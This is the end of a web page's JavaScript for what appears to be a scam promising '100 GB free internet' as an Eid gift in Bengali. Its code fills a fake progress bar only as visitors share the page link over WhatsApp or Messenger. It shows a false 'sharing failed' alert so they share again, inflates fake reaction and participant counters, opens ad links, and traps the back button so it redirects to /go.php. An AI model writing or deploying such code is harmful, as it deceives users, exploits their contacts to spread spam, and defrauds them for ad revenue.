                                        DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
                                    } else

                                        d == 1 ? e = 50 : d == 2 ? e = 65 : d == 3 ? e = 70 : d == 4 ? e = 70 : d == 5 ? e = 80 : d == 6 ? e = 80 : d == 7 ? e = 85 : d == 8 ? e = 90 : d == 9 ? e = 94 : d == 10 ? e = 96 : d == 11 ? e = 98 : d == 12 ? e = 100 : void(0);
                                    d++;
                                    setTimeout(function() {
                                        d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0);
                                        l[i].textContent = e + "%";
                                        DOMString.barLoaders[i].style.width = e + "%";
                                    }, 4000);
                                    set_Cookie('e', e);
                                    set_Cookie('d', d);
                                    window.location.href = "whatsapp://send?text=" + m

                                }), DOMString.messenger.addEventListener("click", function() {
                                    if (12 <= d) {
                                        for (let a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function() {
                                            switch (b) {
                                                case 0:
                                                    window.open(ad1, '_blank');
                                                    break;
                                                case 1:
                                                    window.open(ad2, '_blank');
                                                    break;
                                                case 2:
                                                    window.open(ad3, '_blank');
                                                    break;
                                            }
                                        });
                                        DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
                                    } else

                                        d == 1 ? e = 50 : d == 2 ? e = 65 : d == 3 ? e = 70 : d == 4 ? e = 70 : d == 5 ? e = 80 : d == 6 ? e = 80 : d == 7 ? e = 85 : d == 8 ? e = 90 : d == 9 ? e = 94 : d == 10 ? e = 96 : d == 11 ? e = 98 : d == 12 ? e = 100 : void(0);
                                    d++;
                                    setTimeout(function() {
                                        d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0);
                                        l[i].textContent = e + "%";
                                        DOMString.barLoaders[i].style.width = e + "%";
                                    }, 4000);
                                    set_Cookie('e', e);
                                    set_Cookie('d', d);
                                    window.location.href = "fb-messenger://share/?link=" + landingDomain;
                                })
                            }
                            j++
                        }, 30))
                    }, 1e3)
                }, 1500)) : (DOMString.messageStatus.classList.remove("js-hidden"), DOMString.messageStatus.style.color = "red", DOMString.messageStatus.style.fontWeight = "bold", DOMString.messageStatus.textContent = "We need a number");
        }
    });

    get_Cookie('e') ? setTimeout('enviar()', 500) : void(0);

    function deadline() {
        var day3 = new Date();
        day3.setTime(day3.getTime() + 24 * 60 * 60 * 1000);
        return day3.getFullYear() + "-" + (day3.getMonth() + 1) + "-" + (day3.getDate() + 5);
    }

    function enviar() {
        l = [DOMString.firstPorcent, DOMString.secondPorcent, DOMString.thirdPorcent];
        i = 1;

        clearInterval(window._setting), DOMString.congrats.classList.remove("js-hidden"), DOMString.sharing.classList.remove("js-hidden"), DOMString.share.classList.remove("js-hidden"), DOMString.messenger.classList.remove("js-hidden"), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++;
        var d = parseInt(get_Cookie('d'));
        e = parseInt(get_Cookie('e'));
        m = messageToSend();
        d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0);
        DOMString.barLoaders[i].classList.remove("js-hidden");
        DOMString.boxes[i].classList.remove("js-hidden");
        DOMString.svgLoading[i].classList.remove("js-hidden");
        l[i].textContent = e + "%";
        DOMString.barLoaders[i].style.width = e + "%";
        DOMString.share.classList.remove("js-hidden"), DOMString.messenger.classList.remove("js-hidden"), DOMString.share.addEventListener("click", function() {
            if (10 <= d) {
                for (let a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function() {
                    switch (b) {
                        case 0:
                            window.open(ad1, '_blank');
                            break;
                        case 1:
                            window.open(ad2, '_blank');
                            break;
                        case 2:
                            window.open(ad3, '_blank');
                            break;
                    }
                });
                DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
            } else {
                d == 1 ? e = 50 : d == 2 ? e = 65 : d == 3 ? e = 70 : d == 4 ? e = 70 : d == 5 ? e = 80 : d == 6 ? e = 80 : d == 7 ? e = 85 : d == 8 ? e = 90 : d == 9 ? e = 94 : d == 10 ? e = 96 : d == 11 ? e = 98 : d == 12 ? e = 100 : void(0);
                d++;
                setTimeout(function() {
                    d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0);
                    l[i].textContent = e + "%";
                    DOMString.barLoaders[i].style.width = e + "%";
                }, 4000);
                set_Cookie('e', e);
                set_Cookie('d', d);
                window.location.href = "whatsapp://send?text=" + m;
            }
        }), DOMString.messenger.addEventListener("click", function() {
            if (10 <= d) {
                for (let a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function() {
                    switch (b) {
                        case 0:
                            window.open(ad1, '_blank');
                            break;
                        case 1:
                            window.open(ad2, '_blank');
                            break;
                        case 2:
                            window.open(ad3, '_blank');
                            break;
                    }
                });
                DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
            } else {
                d == 1 ? e = 50 : d == 2 ? e = 65 : d == 3 ? e = 70 : d == 4 ? e = 70 : d == 5 ? e = 80 : d == 6 ? e = 80 : d == 7 ? e = 85 : d == 8 ? e = 90 : d == 9 ? e = 94 : d == 10 ? e = 96 : d == 11 ? e = 98 : d == 12 ? e = 100 : void(0);
                d++;
                setTimeout(function() {
                    d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0);
                    l[i].textContent = e + "%";
                    DOMString.barLoaders[i].style.width = e + "%";
                }, 4000);
                set_Cookie('e', e);
                set_Cookie('d', d);
                window.location.href = "fb-messenger://share/?link=" + landingDomain;
            }
        })
    }

    function tip_text() {
        var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
            b = "";
        return "Sharing failed! The same group or the same friend is invalid. Please share with different friends or groups.";

    }

    function messageToSend() {
        var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
            b = "";
        return "*🎉 ঈদ মোবারক! 100 জিবি ফ্রি ইন্টারনেট! আমিও পেয়েছি, আপনিও নিতে পারেন↓*%0A" + landingDomain;
    }

    function randomString(len) {　　
        len = len || 32;　　
        var $chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678';　　
        var maxPos = $chars.length;　　
        var pwd = '';　　
        for (let i = 0; i < len; i++) {　　　　
            pwd += $chars.charAt(Math.floor(Math.random() * maxPos));　　
        }　　
        return pwd;
    }
    var counter = 153;
    setInterval(function() {
        document.querySelector(".chat__reactions-counter").textContent = counter + "k", counter++
    }, 5e3);
    var counter2 = 337;
    setInterval(function() {
        document.querySelector(".js-counter").textContent = counter2, counter2++
    }, 5e3);
    var seconds = 1;
    setInterval(function() {
        for (var c = document.querySelectorAll(".js-seconds"), a = 0; a < c.length; a++) c[a].textContent = seconds + "m";
        seconds++
    }, 6e3), setTimeout(function() {
        var b = document.querySelector("#js-box-1");
        b.classList.remove("js-hidden"), b.classList.add("fadeInDown")
    }, 1e3), setTimeout(function() {
        var b = document.querySelector("#js-box-2");
        b.classList.remove("js-hidden"), b.classList.add("fadeInDown")
    }, 3e3);
</script>

</div>
<script>
    window.onhashchange = function() {
        jp();
    };

    function hh() {
        history.pushState(history.length + 1, "message", "#" + new Date().getTime());
    }

    function jp() {
        fh();
    }
    setTimeout('hh();', 500);

    function fh() {
        location.href = "/go.php?t=9";
    }
</script>
</body>

</html>